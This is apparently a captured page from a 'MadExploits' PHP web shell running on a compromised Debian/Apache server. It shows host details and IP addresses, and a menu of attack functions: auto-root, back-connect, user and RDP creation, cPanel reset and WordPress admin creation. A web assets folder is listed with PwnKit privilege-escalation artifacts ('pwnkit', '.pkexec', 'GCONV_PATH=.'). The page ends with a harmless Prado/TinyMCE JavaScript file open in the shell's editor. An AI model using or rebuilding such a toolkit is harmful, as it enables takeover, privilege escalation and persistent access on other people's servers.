Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 52.15.233.83
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
assets /
54b90d07 /
prado /
controls /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
accordion.js
3.98
KB
-rwxrwxrwx
controls.js
13.46
KB
-rwxrwxrwx
htmlarea.js
3.56
KB
-rwxrwxrwx
htmlarea4.js
1.43
KB
-rwxrwxrwx
keyboard.js
6.53
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
slider.js
6.97
KB
-rwxrwxrwx
tabpanel.js
1.32
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : htmlarea4.js
/* * * HtmlArea (tinyMCE 4) wrapper * * @author Gabor Berczi <gabor.berczi@devworx.hu> * */ Prado.WebUI.THtmlArea4 = Class.create(Prado.WebUI.Control, { initialize: function($super, options) { options.ID = options.EditorOptions.elements; $super(options); }, onInit : function(options) { this.options = options; tinyMCE.init(this.options.EditorOptions); }, removePreviousInstance: function() { for(var i=0;i<tinyMCE.editors.length;i++) if (tinyMCE.editors[i].id==this.ID) { tinyMCE.editors.splice(i,1); // ugly hack, but works i--; } }, onDone: function() { // check for previous tinyMCE registration, and try to remove it gracefully first var prev = tinyMCE.get(this.ID); if (prev) try { tinyMCE.execCommand('mceFocus', false, this.ID); // when removed, tinyMCE restores its content to the textarea. If the textarea content has been // updated in this same callback, it will be overwritten with the old content. Workaround this. // var curtext = $(this.ID).html(); tinyMCE.execCommand('mceRemoveControl', false, this.ID); // $(this.ID).html(curtext); } catch (e) { // suppress error here in case editor can't be properly removed // (happens when <textarea> has been removed from DOM tree without deinitialzing the tinyMCE editor first) } // doublecheck editor instance here and remove manually from tinyMCE-registry if neccessary this.removePreviousInstance(); } });
Close